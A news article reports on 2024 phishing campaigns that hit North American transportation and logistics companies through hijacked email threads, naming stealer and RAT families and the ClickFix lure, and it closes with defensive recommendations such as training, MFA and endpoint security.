Transportation and logistics companies across North America are facing a new wave of phishing attacks delivering information-stealing malware and remote access trojans (RATs). According to recent reports, these campaigns exploit legitimate email accounts from compromised transport and shipping companies to inject malicious content directly into ongoing email threads.
So far, at least 15 breached email accounts have been identified as part of this phishing scheme. However, the method by which these accounts were initially hacked and the identity of the attackers remain unclear.
The attacks, which primarily occurred between May and July 2024, largely spread Lumma Stealer, StealC, and NetSupport malware, according to a recent analysis. However, in August 2024, the attackers shifted tactics, adopting new infrastructure and methods, introducing malware such as DanaBot and Arechclient2.
The phishing emails often contain internet shortcuts (.URL files) or links to Google Drive that download the malware when opened. In one variant of the attack observed in August 2024, the attackers utilized a technique called ClickFix.
This method tricks victims into downloading DanaBot by pretending to solve a display issue in their web browser. Victims are encouraged to paste a Base64-encoded PowerShell script into their terminal, initiating the malware download.
These campaigns have impersonated various transportation management software, such as Samsara and Astra TMS, to make the phishing attempts appear credible. The deliberate targeting of companies in the transportation and logistics sector suggests that the attackers conduct thorough research into their victims’ operations before launching these attacks.
This cyber campaign unfolds amid the rise of numerous stealer malware strains, including Angry Stealer, Poseidon, Luxy, and CryptBot variants. Additionally, a more sophisticated version of the RomCom RAT, dubbed SnipBot, has emerged.
Distributed through phishing emails with malicious links or fake PDFs, SnipBot allows attackers to run commands and download further malicious modules onto victims’ systems. While RomCom has been linked to ransomware in the past, recent incidents suggest the threat group behind it may be shifting from financial crime to espionage.
To prevent falling victim to these attacks, transportation companies should prioritize cybersecurity training for employees, particularly around phishing threats. Implementing multi-factor authentication (MFA) for all email accounts and monitoring network activity for suspicious behavior are essential steps.
Finally, using endpoint security solutions that scan for malware and limit the damage from infections can significantly reduce the risk of successful attacks.